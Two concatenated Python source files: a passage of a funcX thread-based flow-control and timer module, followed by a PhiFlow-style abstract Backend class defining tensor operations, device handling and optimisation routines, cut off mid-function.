workflow, measure it and redirect it the appropriate executors for
processing.
This is based on the following logic:
.. code-block:: none
BEGIN (INTERVAL, THRESHOLD, callback) :
start = current_time()
while (current_time()-start < INTERVAL) :
count = get_events_since(start)
if count >= THRESHOLD :
break
callback()
This logic ensures that the callbacks are activated with a maximum delay
of `interval` for systems with infrequent events as well as systems which would
generate large bursts of events.
Once a callback is triggered, the callback generally runs a strategy
method on the sites available as well asqeuque
TODO: When the debug logs are enabled this module emits duplicate messages.
This issue needs more debugging. What I've learnt so far is that the duplicate
messages are present only when the timer thread is started, so this could be
from a duplicate logger being added by the thread.
"""
def __init__(self, *args, threshold=20, interval=5):
"""Initialize the flowcontrol object.
We start the timer thread here
Parameters
----------
- threshold (int) : Tasks after which the callback is triggered
- interval (int) : seconds after which timer expires
"""
self.interchange = None
self.threshold = threshold
self.interval = interval
self.cb_args = args
self.callback = self.strategize
self._handle = None
self._event_count = 0
self._event_buffer = []
self._wake_up_time = time.time() + 1
self._kill_event = threading.Event()
self._thread = threading.Thread(target=self._wake_up_timer, args=(self._kill_event,))
self._thread.daemon = True
def start(self, interchange):
"""Actually start the strategy
Parameters
----------
interchange: funcx.executors.high_throughput.interchange.Interchange
Interchange to bind the strategy to
"""
self.interchange = interchange
if hasattr(interchange.config, 'provider'):
logger.debug("Strategy bounds-> init:{}, min:{}, max:{}".format(
interchange.config.provider.init_blocks,
interchange.config.provider.min_blocks,
interchange.config.provider.max_blocks))
self._thread.start()
def strategize(self, *args, **kwargs):
""" Strategize is called everytime the threshold or the interval is hit
"""
logger.debug("Strategize called with {} {}".format(args, kwargs))
def _wake_up_timer(self, kill_event):
"""Internal. This is the function that the thread will execute.
waits on an event so that the thread can make a quick exit when close() is called
Args:
- kill_event (threading.Event) : Event to wait on
"""
while True:
prev = self._wake_up_time
# Waiting for the event returns True only when the event
# is set, usually by the parent thread
time_to_die = kill_event.wait(float(max(prev - time.time(), 0)))
if time_to_die:
return
if prev == self._wake_up_time:
self.make_callback(kind='timer')
else:
print("Sleeping a bit more")
def notify(self, event_id):
"""Let the FlowControl system know that there is an event.
This method is to be called from the Interchange to notify the flowcontrol
"""
self._event_buffer.extend([event_id])
self._event_count += 1
if self._event_count >= self.threshold:
logger.debug("Eventcount >= threshold")
self.make_callback(kind="event")
def make_callback(self, kind=None):
"""Makes the callback and resets the timer.
KWargs:
- kind (str): Default=None, used to pass information on what
triggered the callback
"""
self._wake_up_time = time.time() + self.interval
self.callback(tasks=self._event_buffer, kind=kind)
self._event_buffer = []
def close(self):
"""Merge the threads and terminate."""
self._kill_event.set()
self._thread.join()
class Timer(object):
"""This timer is a simplified version of the FlowControl timer.
This timer does not employ notify events.
This is based on the following logic :
.. code-block:: none
BEGIN (INTERVAL, THRESHOLD, callback) :
start = current_time()
while (current_time()-start < INTERVAL) :
wait()
break
callback()
"""
def __init__(self, callback, *args, interval=5):
"""Initialize the flowcontrol object
We start the timer thread here
Args:
- dfk (DataFlowKernel) : DFK object to track parsl progress
KWargs:
- threshold (int) : Tasks after which the callback is triggered
- interval (int) : seconds after which timer expires
"""
self.interval = interval
self.cb_args = args
self.callback = callback
self._wake_up_time = time.time() + 1
self._kill_event = threading.Event()
self._thread = threading.Thread(target=self._wake_up_timer, args=(self._kill_event,))
self._thread.daemon = True
self._thread.start()
def _wake_up_timer(self, kill_event):
"""Internal. This is the function that the thread will execute.
waits on an event so that the thread can make a quick exit when close() is called
Args:
- kill_event (threading.Event) : Event to wait on
"""
# Sleep till time to wake up
while True:
prev = self._wake_up_time
# Waiting for the event returns True only when the event
# is set, usually by the parent thread
time_to_die = kill_event.wait(float(max(prev - time.time(), 0)))
if time_to_die:
return
if prev == self._wake_up_time:
self.make_callback(kind='timer')
else:
print("Sleeping a bit more")
def make_callback(self, kind=None):
"""Makes the callback and resets the timer.
"""
self._wake_up_time = time.time() + self.interval
self.callback(*self.cb_args)
def close(self):
"""Merge the threads and terminate.
"""
self._kill_event.set()
self._thread.join()
|
_backend.py
|
import sys
import warnings
from collections import namedtuple
from contextlib import contextmanager
from threading import Barrier
from typing import List, Callable
import logging
import numpy
from ._dtype import DType, combine_types
SolveResult = namedtuple('SolveResult', [
'method', 'x', 'residual', 'iterations', 'function_evaluations', 'converged', 'diverged', 'message',
])
class ComputeDevice:
"""
A physical device that can be selected to perform backend computations.
"""
def __init__(self, backend: 'Backend', name: str, device_type: str, memory: int, processor_count: int, description: str, ref=None):
self.name: str = name
""" Name of the compute device. CPUs are typically called `'CPU'`. """
self.device_type: str = device_type
""" Type of device such as `'CPU'`, `'GPU'` or `'TPU'`. """
self.memory: int = memory
""" Maximum memory of the device that can be allocated (in bytes). -1 for n/a. """
self.processor_count: int = processor_count
""" Number of CPU cores or GPU multiprocessors. -1 for n/a. """
self.description: str = description
""" Further information about the device such as driver version. """
self.ref = ref
""" (Optional) Reference to the internal device representation. """
self.backend: 'Backend' = backend
""" Backend that this device belongs to. Different backends represent the same device with different objects. """
def __repr__(self):
mem = f"{(self.memory / 1024 ** 2):.0f} MB" if self.memory > 0 else "memory: n/a"
pro = f"{self.processor_count} processors" if self.processor_count > 0 else "processors: n/a"
ref = f" '{self.ref}'" if isinstance(self.ref, str) else ""
descr = self.description.replace('\n', ' ')
if len(descr) > 30:
descr = descr[:28] + "..."
return f"{self.backend} device '{self.name}' ({self.device_type}{ref}) | {mem} | {pro} | {descr}"
class Backend:
def __init__(self, name: str, default_device: ComputeDevice):
"""
Backends delegate low-level operations to a compute library or emulate them.
The methods of `Backend` form a comprehensive list of available operations.
To support a compute library, subclass `Backend` and register it by adding it to `BACKENDS`.
Args:
name: Human-readable string
default_device: `ComputeDevice` being used by default
"""
self._name = name
self._default_device = default_device
def __enter__(self):
_DEFAULT.append(self)
def __exit__(self, exc_type, exc_val, exc_tb):
_DEFAULT.pop(-1)
@property
def name(self) -> str:
return self._name
def supports(self, feature: str or Callable) -> bool:
"""
Tests if this backend supports the given feature.
Features correspond to a method of this backend that must be implemented if the feature is supported.
Possible features:
* `sparse_coo_tensor`
* `gradients
Args:
feature: `str` or unbound Backend method, e.g. `Backend.sparse_coo_tensor`
Returns:
Whether the feature is supported.
"""
feature = feature if isinstance(feature, str) else feature.__name__
if not hasattr(Backend, feature):
raise ValueError(f"Not a valid feature: '{feature}'")
backend_fun = getattr(Backend, feature)
impl_fun = getattr(self.__class__, feature)
return impl_fun is not backend_fun
def prefers_channels_last(self) -> bool:
raise NotImplementedError()
@property
def precision(self) -> int:
""" Short for math.backend.get_precision() """
return get_precision()
@property
def float_type(self) -> DType:
return DType(float, self.precision)
@property
def as_registered(self) -> 'Backend':
from phi.math.backend import BACKENDS
for backend in BACKENDS:
if self.name in backend.name:
return backend
raise RuntimeError(f"Backend '{self}' is not visible.")
@property
def complex_type(self) -> DType:
return DType(complex, max(64, self.precision))
def combine_types(self, *dtypes: DType) -> DType:
return combine_types(*dtypes, fp_precision=self.precision)
def auto_cast(self, *tensors) -> list:
"""
Determins the appropriate values type resulting from operations involving the tensors as input.
This method is called by the default implementations of basic operators.
Backends can override this method to prevent unnecessary casting.
Args:
*tensors: tensors to cast and to consider when determining the common data type
Returns:
tensors cast to a common data type
"""
dtypes = [self.dtype(t) for t in tensors]
result_type = self.combine_types(*dtypes)
if result_type.kind in (int, float, complex, bool):
tensors = [self.cast(t, result_type) for t in tensors]
return tensors
def __str__(self):
return self.name
def __repr__(self):
return self.name
def list_devices(self, device_type: str or None = None) -> List[ComputeDevice]:
"""
Fetches information about all available compute devices this backend can use.
Implementations:
* NumPy: [`os.cpu_count`](https://docs.python.org/3/library/os.html#os.cpu_count)
* PyTorch: [`torch.cuda.get_device_properties`](https://pytorch.org/docs/stable/cuda.html#torch.cuda.get_device_properties)
* TensorFlow: `tensorflow.python.client.device_lib.list_local_devices`
* Jax: [`jax.devices`](https://jax.readthedocs.io/en/latest/jax.html#jax.devices)
See Also:
`Backend.set_default_device()`.
Args:
device_type: (optional) Return only devices of this type, e.g. `'GPU'` or `'CPU'`. See `ComputeDevice.device_type`.
Returns:
`list` of all currently available devices.
"""
raise NotImplementedError()
def get_default_device(self) -> ComputeDevice:
return self._default_device
def set_default_device(self, device: ComputeDevice or str) -> bool:
"""
Sets the device new tensors will be allocated on.
This function will do nothing if the target device type is not available.
See Also:
`Backend.list_devices()`, `Backend.get_default_device()`.
Args:
device: `ComputeDevice` or device type as `str`, such as `'CPU'` or `'GPU'`.
Returns:
`bool` whether the device was successfully set.
"""
if isinstance(device, str):
devices = self.list_devices(device)
if not devices:
warnings.warn(f"{self.name}: Cannot select '{device}' because no device of this type is available.", RuntimeWarning)
return False
device = devices[0]
assert device.backend is self, f"Cannot set default device to {device.name} for backend {self.name} because the devices belongs to backend {device.backend.name}"
self._default_device = device
return True
def seed(self, seed: int):
raise NotImplementedError()
def is_module(self, obj) -> bool:
"""
Tests if `obj` is of a type that is specific to this backend, e.g. a neural network.
If `True`, this backend will be chosen for operations involving `obj`.
See Also:
`Backend.is_tensor()`.
Args:
obj: Object to test.
"""
raise NotImplementedError()
def is_tensor(self, x, only_native=False):
"""
An object is considered a native tensor by a backend if no internal conversion is required by backend methods.
An object is considered a tensor (nativer or otherwise) by a backend if it is not a struct (e.g. tuple, list) and all methods of the backend accept it as a tensor argument.
If `True`, this backend will be chosen for operations involving `x`.
See Also:
`Backend.is_module()`.
Args:
x: object to check
only_native: If True, only accepts true native tensor representations, not Python numbers or others that are also supported as tensors (Default value = False)
Returns:
bool: whether `x` is considered a tensor by this backend
"""
raise NotImplementedError()
def as_tensor(self, x, convert_external=True):
"""
Converts a tensor-like object to the native tensor representation of this backend.
If x is a native tensor of this backend, it is returned without modification.
If x is a Python number (numbers.Number instance), `convert_numbers` decides whether to convert it unless the backend cannot handle Python numbers.
*Note:* There may be objects that are considered tensors by this backend but are not native and thus, will be converted by this method.
Args:
x: tensor-like, e.g. list, tuple, Python number, tensor
convert_external: if False and `x` is a Python number that is understood by this backend, this method returns the number as-is. This can help prevent type clashes like int32 vs int64. (Default value = True)
Returns:
tensor representation of `x`
"""
raise NotImplementedError()
def is_available(self, tensor) -> bool:
"""
Tests if the value of the tensor is known and can be read at this point.
If true, `numpy(tensor)` must return a valid NumPy representation of the value.
Tensors are typically available when the backend operates in eager mode.
Args:
tensor: backend-compatible tensor
Returns:
bool
"""
raise NotImplementedError()
def numpy(self, tensor) -> numpy.ndarray:
"""
Returns a NumPy representation of the given tensor.
If `tensor` is already a NumPy array, it is returned without modification.
This method raises an error if the value of the tensor is not known at this point, e.g. because it represents a node in a graph.
Use `is_available(tensor)` to check if the value can be represented as a NumPy array.
Args:
tensor: backend-compatible tensor
Returns:
NumPy representation of the values stored in the tensor
"""
raise NotImplementedError()
def to_dlpack(self, tensor):
raise NotImplementedError()
def from_dlpack(self, capsule):
raise NotImplementedError()
def copy(self, tensor, only_mutable=False):
raise NotImplementedError()
def call(self, f: Callable, *args, name=None):
"""
Calls `f(*args)` and returns the result.
This method may be used to register internal calls with the profiler.
Usage:
choose_backend(key).call(custom_function, *args)
"""
return f(*args)
def block_until_ready(self, values):
pass
def jit_compile(self, f: Callable) -> Callable:
return NotImplemented
def functional_gradient(self, f: Callable, wrt: tuple or list, get_output: bool):
"""
Args:
f: Function to differentiate.
wrt: Argument indices for which to compute the gradient.
get_output: Whether the derivative function should return the output of `f` in addition to the gradient.
Returns:
A function `g` with the same arguments as `f`.
If `get_output=True`, `g` returns a `tuple`containing the outputs of `f` followed by the gradients.
"""
raise NotImplementedError(self)
def jacobian(self, f: Callable, wrt: tuple or list, get_output: bool):
raise NotImplementedError(self)
def hessian(self, f: Callable, wrt: tuple or list, get_output: bool, get_gradient: bool) -> tuple:
"""
First dimension of all inputs/outputs of `f` is assumed to be a batch dimension.
Element-wise Hessians will be computed along the batch dimension.
All other dimensions are parameter dimensions and will appear twice in the Hessian matrices.
Args:
f: Function whose first output is a scalar float or complex value.
wrt:
get_output:
get_gradient:
Returns:
Function returning `(f(x), g(x), H(x))` or less depending on `get_output` and `get_gradient`.
The result is always a `tuple` holding at most these three items.
"""
raise NotImplementedError(self)
def custom_gradient(self, f: Callable, gradient: Callable) -> Callable:
"""
Creates a function based on `f` that uses a custom gradient for backprop.
Args:
f: Forward function.
gradient: Function for backprop. Will be called as `gradient(*d_out)` to compute the gradient of `f`.
Returns:
Function with similar signature and return values as `f`. However, the returned function does not support keyword arguments.
"""
return NotImplemented
def jit_compile_grad(self, f, wrt: tuple or list, get_output: bool):
raise NotImplementedError()
def jit_compile_hessian(self, f, wrt: tuple or list, get_output: bool, get_gradient: bool):
raise NotImplementedError()
def transpose(self, tensor, axes):
raise NotImplementedError()
def random_uniform(self, shape, low, high, dtype: DType or None):
""" Float tensor of selected precision containing random values in the range [0, 1) """
raise NotImplementedError(self)
def random_normal(self, shape):
""" Float tensor of selected precision containing random values sampled from a normal distribution with mean 0 and std 1. """
raise NotImplementedError(self)
def stack(self, values, axis=0):
raise NotImplementedError(self)
def concat(self, values, axis):
raise NotImplementedError(self)
def pad(self, value, pad_width, mode: str = 'constant', constant_values=0):
"""
Pad a tensor with values as specified by `mode` and `constant_values`.
If the mode is not supported, returns NotImplemented.
Args:
value: tensor
pad_width: 2D tensor specifying the number of values padded to the edges of each axis in the form [[axis 0 lower, axis 0 upper], ...] including batch and component axes.
mode: constant', 'boundary', 'periodic', 'symmetric', 'reflect'
constant_values: used for out-of-bounds points if mode='constant' (Default value = 0)
mode: str: (Default value = 'constant')
Returns:
padded tensor or NotImplemented
"""
raise NotImplementedError(self)
def reshape(self, value, shape):
raise NotImplementedError(self)
def flip(self, value, axes: tuple or list):
slices = tuple(slice(None, None, -1 if i in axes else None) for i in range(self.ndims(value)))
return value[slices]
def sum(self, value, axis=None, keepdims=False):
raise NotImplementedError(self)
def prod(self, value, axis=None):
raise NotImplementedError(self)
def divide_no_nan(self, x, y):
""" Computes x/y but returns 0 if y=0. """
raise NotImplementedError(self)
def where(self, condition, x=None, y=None):
raise NotImplementedError(self)
def nonzero(self, values):
"""
Args:
values: Tensor with only spatial dimensions
Returns:
non-zero multi-indices as tensor of shape (nnz, vector)
"""
raise NotImplementedError(self)
def mean(self, value, axis=None, keepdims=False):
raise NotImplementedError(self)
def range(self, start, limit=None, delta=1, dtype: DType = DType(int, 32)):
raise NotImplementedError(self)
def zeros(self, shape, dtype: DType = None):
raise NotImplementedError(self)
def zeros_like(self, tensor):
raise NotImplementedError(self)
def ones(self, shape, dtype: DType = None):
raise NotImplementedError(self)
def ones_like(self, tensor):
raise NotImplementedError(self)
def meshgrid(self, *coordinates):
raise NotImplementedError(self)
def linspace(self, start, stop, number):
raise NotImplementedError(self)
def tensordot(self, a, a_axes: tuple or list, b, b_axes: tuple or list):
""" Multiply-sum-reduce a_axes of a with b_axes of b. """
raise NotImplementedError(self)
def matmul(self, A, b):
raise NotImplementedError(self)
def einsum(self, equation, *tensors):
raise NotImplementedError(self)
def cumsum(self, x, axis: int):
raise NotImplementedError(self)
def while_loop(self, loop: Callable, values: tuple):
"""
```python
while any(values[0]):
values = loop(*values)
return values
```
This operation does not support backpropagation.
Args:
loop: Loop function, must return a `tuple` with entries equal to `values` in shape and data type.
values: Initial values of loop variables.
Returns:
Loop variables upon loop completion.
"""
raise NotImplementedError(self)
def abs(self, x):
raise NotImplementedError(self)
def sign(self, x):
raise NotImplementedError(self)
def round(self, x):
raise NotImplementedError(self)
def ceil(self, x):
raise NotImplementedError(self)
def floor(self, x):
raise NotImplementedError(self)
def max(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def min(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def maximum(self, a, b):
raise NotImplementedError(self)
def minimum(self, a, b):
raise NotImplementedError(self)
def clip(self, x, minimum, maximum):
raise NotImplementedError(self)
def sqrt(self, x):
raise NotImplementedError(self)
def exp(self, x):
raise NotImplementedError(self)
def conv(self, value, kernel, zero_padding=True):
"""
Convolve value with kernel.
Depending on the tensor rank, the convolution is either 1D (rank=3), 2D (rank=4) or 3D (rank=5).
Higher dimensions may not be supported.
Args:
value: tensor of shape (batch_size, in_channel, spatial...)
kernel: tensor of shape (batch_size or 1, out_channel, in_channel, spatial...)
zero_padding: If True, pads the edges of `value` with zeros so that the result has the same shape as `value`.
Returns:
Convolution result as tensor of shape (batch_size, out_channel, spatial...)
"""
raise NotImplementedError(self)
def expand_dims(self, a, axis=0, number=1):
raise NotImplementedError(self)
def shape(self, tensor):
"""
Returns the shape of a tensor.
The shape is iterable and implements `len()`.
For non-eager tensors, undefined dimensions should return a placeholder value representing the size.
See Also:
`Backend.staticshape()`.
Args:
tensor: Native tensor compatible with this backend.
Returns:
Shape of `tensor`
"""
raise NotImplementedError(self)
def staticshape(self, tensor) -> tuple:
"""
Evaluates the static shape of a native tensor.
If the tensor is eager, the shape is a `tuple[int]`.
For placeholder tensors, unknown dimensions are represented as `None`.
See Also:
`Backend.shape()`.
Args:
tensor: Native tensor compatible with this backend.
Returns:
`tuple` of sizes. Each size is an `int` if the size is defined, else `None`.
"""
raise NotImplementedError(self)
def cast(self, x, dtype: DType):
raise NotImplementedError(self)
def to_float(self, x):
"""
Converts a tensor to floating point values with precision equal to the currently set default precision.
See Also:
`Backend.precision()`.
If `x` is mutable and of the correct floating type, returns a copy of `x`.
To convert float tensors to the backend precision but leave non-float tensors untouched, use `Backend.as_tensor()`.
Args:
x: tensor of bool, int or float
Returns:
Values of `x` as float tensor
"""
return self.cast(x, self.float_type)
def to_int32(self, x):
return self.cast(x, DType(int, 32))
def to_int64(self, x):
return self.cast(x, DType(int, 64))
def to_complex(self, x):
return self.cast(x, DType(complex, max(64, self.precision * 2)))
def batched_gather_nd(self, values, indices):
"""
Gathers values from the tensor `values` at locations `indices`.
The first dimension of `values` and `indices` is the batch dimension which must be either equal for both or one for either.
Args:
values: tensor of shape (batch, spatial..., channel)
indices: int tensor of shape (batch, any..., multi_index) where the size of multi_index is values.rank - 2.
Returns:
Gathered values as tensor of shape (batch, any..., channel)
"""
raise NotImplementedError(self)
def flatten(self, x):
return self.reshape(x, (-1,))
def std(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def boolean_mask(self, x, mask, axis=0):
"""
Args:
x: tensor with any number of dimensions
mask: 1D mask tensor
axis: Axis index >= 0
"""
raise NotImplementedError(self)
def isfinite(self, x):
raise NotImplementedError(self)
def scatter(self, base_grid, indices, values, mode: str):
"""
Depending on `mode`, performs scatter_update or scatter_add.
Args:
base_grid: Tensor into which scatter values are inserted at indices. Tensor of shape (batch_size, spatial..., channels)
indices: Tensor of shape (batch_size or 1, update_count, index_vector)
values: Values to scatter at indices. Tensor of shape (batch_size or 1, update_count or 1, channels or 1)
mode: One of ('update', 'add')
Returns:
Copy of base_grid with values at `indices` updated by `values`.
"""
raise NotImplementedError(self)
def any(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError(self)
def all(self, boolean_tensor, axis=None, keepdims=False):
raise NotImplementedError(self)
def quantile(self, x, quantiles):
"""
Reduces the last / inner axis of x.
Args:
x: Tensor
quantiles: List or 1D tensor of quantiles to compute.
Returns:
Tensor with shape (quantiles, *x.shape[:-1])
"""
raise NotImplementedError(self)
def fft(self, x, axes: tuple or list):
"""
Computes the n-dimensional FFT along all but the first and last dimensions.
Args:
x: tensor of dimension 3 or higher
axes: Along which axes to perform the FFT
Returns:
Complex tensor `k`
"""
raise NotImplementedError(self)
def ifft(self, k, axes: tuple or list):
"""
Computes the n-dimensional inverse FFT along all but the first and last dimensions.
Args:
k: tensor of dimension 3 or higher
axes: Along which axes to perform the inverse FFT
Returns:
Complex tensor `x`
"""
raise NotImplementedError(self)
def imag(self, x):
raise NotImplementedError(self)
def real(self, x):
raise NotImplementedError(self)
def conj(self, x):
raise NotImplementedError(self)
def sin(self, x):
raise NotImplementedError(self)
def arcsin(self, x):
raise NotImplementedError(self)
def cos(self, x):
raise NotImplementedError(self)
def arccos(self, x):
raise NotImplementedError(self)
def tan(self, x):
raise NotImplementedError(self)
def log(self, x):
""" Natural logarithm """
raise NotImplementedError(self)
def log2(self, x):
raise NotImplementedError(self)
def log10(self, x):
raise NotImplementedError(self)
def sigmoid(self, x):
return 1 / (1 + self.exp(-x))
def dtype(self, array) -> DType:
raise NotImplementedError(self)
def tile(self, value, multiples):
"""
Repeats the tensor along each axis the number of times given by multiples.
If `multiples` has more dimensions than `value`, these dimensions are added to `value` as outer dimensions.
Args:
value: tensor
multiples: tuple or list of integers
Returns:
tile tensor
"""
raise NotImplementedError(self)
def sparse_coo_tensor(self, indices: tuple or list, values, shape: tuple):
"""
Create a sparse matrix in coordinate list (COO) format.
Optional feature.
See Also:
`Backend.csr_matrix()`, `Backend.csc_matrix()`.
Args:
indices: 2D tensor of shape `(2, n)` or tuple/list of two 1D tensors `(rows, cols)`.
values: 1D values tensor matching `indices`
shape: Shape of the sparse matrix
Returns:
Native representation of the sparse matrix
"""
raise NotImplementedError(self)
def csr_matrix(self, column_indices, row_pointers, values, shape: tuple):
"""
Create a sparse matrix in compressed sparse row (CSR) format.
Optional feature.
See Also:
`Backend.sparse_coo_tensor()`, `Backend.csc_matrix()`.
Args:
column_indices: Column indices corresponding to `values`, 1D tensor
row_pointers: Indices in `values` where any row starts, 1D tensor of length `rows + 1`
values: Non-zero values, 1D tensor
shape: Shape of the full matrix
Returns:
Native representation of the sparse matrix
"""
raise NotImplementedError(self)
def csc_matrix(self, column_pointers, row_indices, values, shape: tuple):
"""
Create a sparse matrix in compressed sparse column (CSC) format.
Optional feature.
See Also:
`Backend.sparse_coo_tensor()`, `Backend.csr_matrix()`.
Args:
column_pointers: Indices in `values` where any column starts, 1D tensor of length `cols + 1`
row_indices: Row indices corresponding to `values`.
values: Non-zero values, 1D tensor
shape: Shape of the full matrix
Returns:
Native representation of the sparse matrix
"""
raise NotImplementedError(self)
def coordinates(self, tensor):
"""
Returns the coordinates and values of a tensor.
Args:
tensor: Sparse tensor
Returns:
coordinates: `tuple` of tensor holding the coordinate vectors, i.e. (row, col) for matrices.
indices: Tensor holding the corresponding values
"""
raise NotImplementedError(self)
def minimize(self, method: str, f, x0, atol, max_iter, trj: bool):
if method == 'GD':
return self._minimize_gradient_descent(f, x0, atol, max_iter, trj)
from scipy.optimize import OptimizeResult, minimize
from threading import Thread
assert self.supports(Backend.functional_gradient)
x0 = self.numpy(x0)
assert x0.ndim == 2 # (batch, parameters)
atol = self.numpy(atol)
max_iter = self.numpy(max_iter)
batch_size = x0.shape[0]
fg = self.functional_gradient(f, [0], get_output=True)
method_description = f"SciPy {method} with {self.name}"
iterations = [0] * batch_size
function_evaluations = [0] * batch_size
xs = [None] * batch_size
final_losses = [None] * batch_size
converged = [False] * batch_size
diverged = [False] * batch_size
messages = [""] * batch_size
f_inputs = [None] * batch_size
f_b_losses = None
f_b_losses_np = None
f_grad_np = None
f_input_available = Barrier(batch_size + 1)
f_output_available = Barrier(batch_size + 1)
finished = [False] * batch_size
all_finished = False
trajectories = [[] for _ in range(batch_size)] if trj else None
threads = []
for b in range(batch_size): # Run each independent example as a scipy minimization in a new thread
def b_thread(b=b):
recent_b_losses = []
def b_fun(x: numpy.ndarray):
function_evaluations[b] += 1
f_inputs[b] = self.as_tensor(x, convert_external=True)
f_input_available.wait()
f_output_available.wait()
recent_b_losses.append(f_b_losses[b])
if final_losses[b] is None: # first evaluation
final_losses[b] = f_b_losses[b]
if trajectories is not None:
trajectories[b].append(SolveResult(method_description, x0[b], f_b_losses[b], 0, 1, False, False, ""))
return f_b_losses_np[b], f_grad_np[b]
def callback(x, *args): # L-BFGS-B only passes x but the documentation says (x, state)
iterations[b] += 1
loss = min(recent_b_losses)
recent_b_losses.clear()
final_losses[b] = loss
if trajectories is not None:
trajectories[b].append(SolveResult(method_description, x, loss, iterations[b], function_evaluations[b], False, False, ""))
res = minimize(fun=b_fun, x0=x0[b], jac=True, method=method, tol=atol[b], options={'maxiter': max_iter[b]}, callback=callback)
assert isinstance(res, OptimizeResult)
# res.nit, res.nfev
xs[b] = res.x
converged[b] = res.success
diverged[b] = res.status not in (0, 1) # 0=success
messages[b] = res.message
finished[b] = True
while not all_finished:
f_input_available.wait()
f_output_available.wait()
b_thread = Thread(target=b_thread)
threads.append(b_thread)
b_thread.start()
while True:
f_input_available.wait()
if all(finished):
all_finished = True
f_output_available.wait()
break
_, f_b_losses, f_grad = fg(self.stack(f_inputs)) # Evaluate function and gradient
f_b_losses_np = self.numpy(f_b_losses).astype(numpy.float64)
f_grad_np = self.numpy(f_grad).astype(numpy.float64)
f_output_available.wait()
for b_thread in threads:
b_thread.join() # make sure threads exit correctly
if trj:
max_trajectory_length = max([len(t) for t in trajectories])
last_points = [SolveResult(method_description, xs[b], final_losses[b], iterations[b], function_evaluations[b], converged[b], diverged[b], "") for b in range(batch_size)]
trajectories = [t[:-1] + [last_point] * (max_trajectory_length - len(t) + 1) for t, last_point in zip(trajectories, last_points)]
trajectory = []
for states in zip(*trajectories):
x = self.stack([self.to_float(state.x) for state in states])
residual = self.stack([state.residual for state in states])
iterations = [state.iterations for state in states]
function_evaluations = [state.function_evaluations for state in states]
converged = [state.converged for state in states]
diverged = [state.diverged for state in states]
trajectory.append(SolveResult(method_description, x, residual, iterations, function_evaluations, converged, diverged, messages))
return trajectory
else:
x = self.stack(xs)
residual = self.stack(final_losses)
return SolveResult(method_description, x, residual, iterations, function_evaluations, converged, diverged, messages)
def _minimize_gradient_descent(self, f, x0, atol, max_iter, trj: bool, step_size='adaptive'):
assert self.supports(Backend.functional_gradient)
assert len(self.staticshape(x0)) == 2 # (batch, parameters)
batch_size = self.staticshape(x0)[0]
fg = self.functional_gradient(f, [0], get_output=True)
method = f"Gradient descent with {self.name}"
iterations = self.zeros([batch_size], DType(int, 32))
function_evaluations = self.ones([batch_size], DType(int, 32))
adaptive_step_size = step_size == 'adaptive'
if adaptive_step_size:
step_size = self.zeros([batch_size]) + 0.1
_, loss, grad = fg(x0) # Evaluate function and gradient
diverged = self.any(~self.isfinite(x0), axis=(1,))
converged = self.zeros([batch_size], DType(bool))
trajectory = [SolveResult(method, x0, loss, iterations, function_evaluations, converged, diverged, [""] * batch_size)] if trj else None
continue_ = ~converged & ~diverged & (iterations < max_iter)
def gd_step(continue_, x, loss, grad, iterations, function_evaluations, step_size, converged, diverged):
prev_loss, prev_grad, prev_x = loss, grad, x
continue_1 = self.to_int32(continue_)
iterations += continue_1
if adaptive_step_size:
for i in range(20):
dx = - grad * self.expand_dims(step_size * self.to_float(continue_1), -1)
next_x = x + dx
predicted_loss_decrease = - self.sum(grad * dx, -1) # >= 0
_, next_loss, next_grad = fg(next_x); function_evaluations += continue_1
converged = converged | (self.sum(next_grad ** 2, axis=-1) < atol ** 2)
PHI_LOGGER.debug(f"Gradient: {self.numpy(next_grad)} with step_size={self.numpy(step_size)}")
actual_loss_decrease = loss - next_loss # we want > 0
# we want actual_loss_decrease to be at least half of predicted_loss_decrease
act_pred = self.divide_no_nan(actual_loss_decrease, predicted_loss_decrease)
PHI_LOGGER.debug(f"Actual/Predicted: {self.numpy(act_pred)}")
step_size_fac = self.clip(self.log(1 + 1.71828182845 * self.exp((act_pred - 0.5) * 2.)), 0.1, 10)
PHI_LOGGER.debug(f"step_size *= {self.numpy(step_size_fac)}")
step_size *= step_size_fac
if self.all((act_pred > 0.4) & (act_pred < 0.9) | converged | diverged):
PHI_LOGGER.debug(f"GD minimization: Finished step_size adjustment after {i + 1} tries\n")
break
else:
converged = converged | (abs(actual_loss_decrease) < predicted_loss_decrease)
PHI_LOGGER.debug("Backend._minimize_gradient_descent(): No step size found!\n")
diverged = diverged | (next_loss > loss)
x, loss, grad = next_x, next_loss, next_grad
else:
x -= grad * self.expand_dims(step_size * self.to_float(continue_1), -1)
_, loss, grad = fg(x); function_evaluations += continue_1
diverged = self.any(~self.isfinite(x), axis=(1,)) | (loss > prev_loss)
converged = ~diverged & (prev_loss - loss < atol)
if trj:
trajectory.append(SolveResult(method, self.numpy(x), self.numpy(loss), self.numpy(iterations), self.numpy(function_evaluations), self.numpy(diverged), self.numpy(converged), [""] * batch_size))
continue_ = ~converged & ~diverged & (iterations < max_iter)
return continue_, x, loss, grad, iterations, function_evaluations, step_size, converged, diverged
not_converged, x, loss, grad, iterations, function_evaluations, step_size, converged, diverged = self.while_loop(gd_step, (continue_, x0, loss, grad, iterations, function_evaluations, step_size, converged, diverged))
if trj:
trajectory.append(SolveResult(method, x, loss, iterations, function_evaluations + 1, converged, diverged, [""] * batch_size))
return trajectory
else:
return SolveResult(method, x, loss, iterations, function_evaluations, converged, diverged, [""] * batch_size)
def linear_solve(self, method: str, lin, y, x0, rtol, atol, max_iter, trj: bool) -> SolveResult or List[SolveResult]:
"""
Solve the system of linear equations A · x = y.
This method need not provide a gradient for the operation.
Args:
method: Which algorithm to use. One of `('auto', 'CG', 'CG-adaptive')`.
lin: Linear operation. One of
* sparse/dense matrix valid for all instances
* tuple/list of sparse/dense matrices for varying matrices along batch, must have the same nonzero locations.
* linear function A(x), must be called on all instances in parallel
y: target result of A * x. 2nd order tensor (batch, vector) or list of vectors.
x0: Initial guess of size (batch, parameters)
rtol: Relative tolerance of size (batch,)
atol: Absolute tolerance of size (batch,)
max_iter: Maximum number of iterations of size (batch,)
trj: Whether to record and return the optimization trajectory as a `List[SolveResult]`.
Returns:
result: `SolveResult` or `List[SolveResult]`, depending on `trj`.
"""
if method == 'auto':
return self.conjugate_gradient_adaptive(lin, y, x0, rtol, atol, max_iter, trj)
elif method == 'CG':
return self.conjugate_gradient(lin, y, x0, rtol, atol, max_iter, trj)
elif method == 'CG-adaptive':
return self.conjugate_gradient_adaptive(lin, y, x0, rtol, atol, max_iter, trj)
else:
